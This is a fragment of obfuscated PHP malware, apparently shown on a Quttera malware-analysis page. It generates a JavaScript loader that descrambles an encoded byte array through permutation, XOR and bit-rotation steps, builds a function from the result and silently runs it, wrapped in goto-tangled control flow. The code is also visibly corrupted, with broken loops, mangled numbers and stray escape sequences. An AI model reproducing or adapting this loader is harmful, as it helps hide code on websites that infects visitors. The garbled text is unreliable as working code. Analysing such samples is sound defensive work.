var " . $a834c["pm"] . "=[2c,5g,11,13,17a9b3,29,31,,41d3d7e3e9f1,67,71];
var " . $a834c["mp"] . "=[];or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<256;" . $a834c["ix"] . "++){" . $a834c["mp"] . "[" . $a834c["ix"] . "]=" . $a834c["ix"] . ";}
var " . $a834c["sd"] . "=" . $a834c["k3"] . ";
for(var " . $a834c["ix"] . "55;" . $a834c["ix"] . ";" . $a834c["ix"] . "--){
var " . $a834c["ch"] . "=" . $a834c["ix"] . "%" . $a834c["pm"] . ".length;
" . $a834c["sd"] . "=(" . $a834c["sd"] . "*" . $a834c["pm"] . "[" . $a834c["ch"] . "]+" . $a834c["pm"] . "[(" . $a834c["ch"] . "_)%" . $a834c["pm"] . ".length])%536;
var " . $a834c["jx"] . "=" . $a834c["sd"] . "%(" . $a834c["ix"] . "+1);\xavar " . $a834c["tp"] . "=" . $a834c["mp"] . "[" . $a834c["ix"] . "];" . $a834c["mp"] . "[" . $a834c["ix"] . "]=" . $a834c["mp"] . "[" . $a834c["jx"] . "];" . $a834c["mp"] . "[" . $a834c["jx"] . "]=" . $a834c["tp"] . ";}
var " . $a834c["sh"] . "=new Array(2);
for(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<6;" . $a834c["ix"] . "++){" . $a834c["sh"] . "[" . $a834c["mp"] . "[" . $a834c["ix"] . "]]=" . $a834c["ix"] . ";}or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){" . $a834c["bx"] . "[" . $a834c["ix"] . "]=" . $a834c["sh"] . "[" . $a834c["bx"] . "[" . $a834c["ix"] . "]];}
var " . $a834c["fb"] . "=[1,1];or(var " . $a834c["ix"] . "=2;" . $a834c["ix"] . "0;" . $a834c["ix"] . "++){" . $a834c["fb"] . "[" . $a834c["ix"] . "]=(" . $a834c["fb"] . "[" . $a834c["ix"] . "-1]+" . $a834c["fb"] . "[" . $a834c["ix"] . "-2])*56;}or(var " . $a834c["ix"] . ";" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){
var " . $a834c["ch"] . "=(" . $a834c["ix"] . "+(" . $a834c["k2"] . ")7))%" . $a834c["fb"] . ".length;
" . $a834c["bx"] . "[" . $a834c["ix"] . "]^=" . $a834c["fb"] . "[(" . $a834c["ch"] . "+3)%" . $a834c["fb"] . ".length];\xavar " . $a834c["sh"] . "=" . $a834c["fb"] . "[" . $a834c["ch"] . "]%8;
var " . $a834c["bf"] . "=" . $a834c["bx"] . "[" . $a834c["ix"] . "];
" . $a834c["bx"] . "[" . $a834c["ix"] . "]=((" . $a834c["bf"] . ">>" . $a834c["sh"] . ")|(" . $a834c["bf"] . "<<(8-" . $a834c["sh"] . ")))&5;}\xavar " . $a834c["st"] . "=[" . $a834c["k1"] . "," . $a834c["k2"] . "," . $a834c["k1"] . "^" . $a834c["k2"] . ",(" . $a834c["k1"] . "+" . $a834c["k2"] . ")&0xFFFFFFFF];or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["bx"] . ".length;" . $a834c["ix"] . "++){
var " . $a834c["ch"] . "=" . $a834c["ix"] . ",;
" . $a834c["st"] . "[" . $a834c["ch"] . "]=(" . $a834c["st"] . "[" . $a834c["ch"] . "]+" . $a834c["st"] . "[(" . $a834c["ch"] . "Y),])&0xFFFFFFFF;
" . $a834c["st"] . "[" . $a834c["ch"] . "]=((" . $a834c["st"] . "[" . $a834c["ch"] . "]<<8)|(" . $a834c["st"] . "[" . $a834c["ch"] . "]>>4))&0xFFFFFFFF;\xavar " . $a834c["bf"] . "=(" . $a834c["st"] . "[" . $a834c["ch"] . "]^" . $a834c["st"] . "[(" . $a834c["ch"] . "+2)%4])&5;\xa" . $a834c["bx"] . "[" . $a834c["ix"] . "]^=" . $a834c["bf"] . ";}
var " . $a834c["fn"] . "="";\xavar " . $a834c["rt"] . "=String["["+("""+"a")];or(var " . $a834c["ix"] . "=0;" . $a834c["ix"] . "<" . $a834c["ln"] . ";" . $a834c["ix"] . "++){" . $a834c["fn"] . "+=" . $a834c["rt"] . "(" . $a834c["bx"] . "[" . $a834c["ix"] . "]);}\xavar " . $a834c["tp"] . "=" . $f478a . ";
var " . $a834c["sd"] . "=""[" . $a834c["tp"] . "][" . $a834c["tp"] . "](" . $a834c["fn"] . ");
" . $a834c["sd"] . "();
}catch(e){}})();"; goto ef9e9; c9043: $B07f6 = str_split($F8305); goto A0ac7; Debb4: if ($Ec3a6 == 1) { goto a27cb; } goto Afd13; E1bec: $abd21 = $a80c5[array_rand($a80c5)]; goto Ffa36; Ec2e6: goto f4eac; B646f: d29d9: goto Ec2e6; b6bd1: edc8e: goto c023a; c023a: $f478a = """ . implode('', $ecd18) . """; goto E0f7f; Ae3d8: a27cb: goto adec9; Afd13: if ($Ec3a6 == 2) { goto bc254; } goto D7aaa; ef9e9: } }
© 2023 Quttera Ltd. All rights reserved.